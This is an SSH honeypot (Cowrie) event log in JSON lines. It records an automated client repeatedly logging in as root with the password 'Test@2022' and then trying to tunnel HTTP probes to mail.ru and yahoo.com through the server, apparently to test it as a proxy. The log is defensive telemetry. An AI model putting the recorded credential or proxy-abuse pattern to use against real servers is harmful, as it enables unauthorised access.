{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":23704,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:23704","sensor":"my-vps","timestamp":"2025-08-31T03:45:12.968272Z","session":"ad7e8edb238e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.018424Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.069146Z","src_ip":"77.83.207.83","session":"ad7e8edb238e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47450,"dst_ip":"1.2.3.4","dst_port":22,"session":"77d32d6a16f8","protocol":"ssh","message":"New connection: 77.83.207.83:47450 (1.2.3.4:22) [session: 77d32d6a16f8]","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.119193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.119794Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.170716Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.421769Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23643,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23643","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.473074Z","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.523839Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":25371,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25371","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.664910Z","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.715594Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":17547,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:17547","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.856944Z","session":"77d32d6a16f8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.908032Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:13.959407Z","src_ip":"77.83.207.83","session":"77d32d6a16f8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47571,"dst_ip":"1.2.3.4","dst_port":22,"session":"949493d97741","protocol":"ssh","message":"New connection: 77.83.207.83:47571 (1.2.3.4:22) [session: 949493d97741]","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.010724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.020871Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.064080Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.215530Z","src_ip":"212.227.125.160","session":"aca4c531c631"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.327463Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29734,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29734","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.381999Z","session":"949493d97741"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.434849Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":13581,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13581","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.583278Z","session":"949493d97741"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.636260Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.660458Z","src_ip":"212.227.235.229","session":"1e043fb059c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":21998,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:21998","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.783191Z","session":"949493d97741"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.821946Z","src_ip":"212.227.235.229","session":"1e043fb059c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.835888Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.889799Z","src_ip":"77.83.207.83","session":"949493d97741"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47673,"dst_ip":"1.2.3.4","dst_port":22,"session":"8265d80f5a76","protocol":"ssh","message":"New connection: 77.83.207.83:47673 (1.2.3.4:22) [session: 8265d80f5a76]","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.941137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.941887Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:14.994557Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.253013Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16615,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16615","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.306138Z","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.358429Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10183,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10183","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.506115Z","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.557992Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5917,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5917","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.702266Z","session":"8265d80f5a76"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.754457Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.807047Z","src_ip":"77.83.207.83","session":"8265d80f5a76"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47779,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e6371cefaa","protocol":"ssh","message":"New connection: 77.83.207.83:47779 (1.2.3.4:22) [session: 89e6371cefaa]","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.856069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.856981Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:15.906970Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.155953Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20211,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20211","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.206643Z","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.256749Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30245,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30245","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.400313Z","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.450248Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":9655,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9655","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.592331Z","session":"89e6371cefaa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.642175Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.693228Z","src_ip":"77.83.207.83","session":"89e6371cefaa"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":47882,"dst_ip":"1.2.3.4","dst_port":22,"session":"d74c53a1e9ad","protocol":"ssh","message":"New connection: 77.83.207.83:47882 (1.2.3.4:22) [session: d74c53a1e9ad]","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.743709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:16.744501Z","src_ip":"77.83.207.83","session":"d74c53a1e9ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha2